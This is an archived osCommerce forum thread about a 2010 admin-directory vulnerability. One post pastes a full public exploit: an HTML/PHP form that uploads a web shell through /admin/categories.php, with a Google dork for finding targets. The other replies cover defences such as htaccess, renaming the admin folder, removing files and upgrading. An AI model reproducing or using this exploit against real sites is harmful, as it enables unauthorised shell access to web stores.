Jump to content

Archived

This topic is now archived and is closed to further replies.

pamamolf

New exploit TODAY is out !

Recommended Posts

I think this has already been discussed - htaccess of the admin folder etc etc

 

I could be wrong and no doubt if I am I'm sure if this is a new exploit some of the php gurus will soon have something to say.....


I'm feeling lucky today......maybe someone will answer my post!

I do try and answer a simple post when I can just to give something back.

------------------------------------------------

PM me? - I'm not for hire

Share this post


Link to post
Share on other sites

It is an OLD exploit using file_manager.php and define_language.php. REMOVE those files from the admin directory, the languages directory and also remove the link from tools.php.

 

 

Refer to this thread for more information:

 

Admin Security

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Hi there,

this is the new exploit, he was published today:

 

oscommerce remote upload from categories.php

 

# Exploit Title: [oscommerce remote upload from categories.php]

# Google Dork: ["powered by oscommerce"]

# Date: [20-November-2010]

# Author: [Number 7]

#Contact: {an[dot]7[at]live[dot]fr}

# Software Link: [http://www.oscommerce.com/solutions/downloads]

# Tested on: [windows-linux-FreeBSD-Solaris]

 

exploit:

 

<html>

<head>

<title>Download</title>

</head>

<body>

<div style="text-align: center;"><big

style="color: rgb(253, 0, 0);"><big><big>Discovered

By Number 7<br>

</big></big></big><span

style="color: rgb(102, 102, 102);">(best defacer kairouan

tunisia 2010)</span><br>

</div>

<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce

script: Remote File Upload in /admin/Categories.php</big></big><br>

<?php $host ="site";

$path ="ath";

?>

<form name="new_product"

action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"

method="post" enctype="multipart/form-data"><br>

<input name="products_image" type="file"><br>

<input name="submit" value=" Save " type="submit"><br>

<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell

here:</big></big><br>

<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");

?></form>

</body>

</html>

 

[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Älen#Sami(s-man)#zone-h/crew#all tunisian hackers]

[~] Home :info-geek.com/ # v4-team.com/cc/

Share this post


Link to post
Share on other sites

 

this is the new exploit, he was published today:

 

action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"

 

HE may have found it, but it has been addressed before. The exploit uses an unsecured "admin" directory (see the action line above.) If you have secured the admin directory and changed it's name then this exploit will fail.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

Yes, thats right. "If you have secured the admin directory and changed it's name then this exploit will fail." Working too if you don't change the admin directory name.

Share this post


Link to post
Share on other sites

its pointless to install any osc site without a minimum of security measures, out there are robots able to hack any unsecured osc site ten times any single day. I suggest to secure first and install after.

Share this post


Link to post
Share on other sites

its pointless to install any osc site without a minimum of security measures, out there are robots able to hack any unsecured osc site ten times any single day. I suggest to secure first and install after.

 

It is pointless to install ANY website without security measures

 

In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?

 

Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering


Currently...:

 

Working with osCommerce 2.3.1

Now working with Phoenix

Add-Ons so far Installed:

Not all of these installed yet on Phoenix - some are and the rest will be

 

Add date and order number to invoice and packing slip,

Products Cycle Slideshow,

Detailed Monthly Sales,

Holiday Settings,

Tracking Module for 2.3

Share this post


Link to post
Share on other sites

This hack exploits the PHP basename function in admin directories where htaccess is not used to control logins. The code in admin/includes/application_top.php can be amended to stop this hack - but the safest solution, as mentioned above, is to use htaccess in the admin directory.


Your online success is Paramount.

Share this post


Link to post
Share on other sites

Or just upgrade to 2.3.1 where this exploit isn't possible thumbsup.gif


Mark Evans

osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)

 

---------------------------------------

Software is like sex: It's better when it's free. (Linus Torvalds)

Share this post


Link to post
Share on other sites

Completely agree. It is not only oscommerce that is targetted... WordPress, Joomla, Drupal and even custom sites, if not secured

will be attacked (and probably hacked).

 

 

 

It is pointless to install ANY website without security measures

 

In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?

 

Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering

Share this post


Link to post
Share on other sites

The best thing you can do for your web content is keep your site up to date with the latest code. That is the most secure practice albeit not always the easiest thing to do.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

×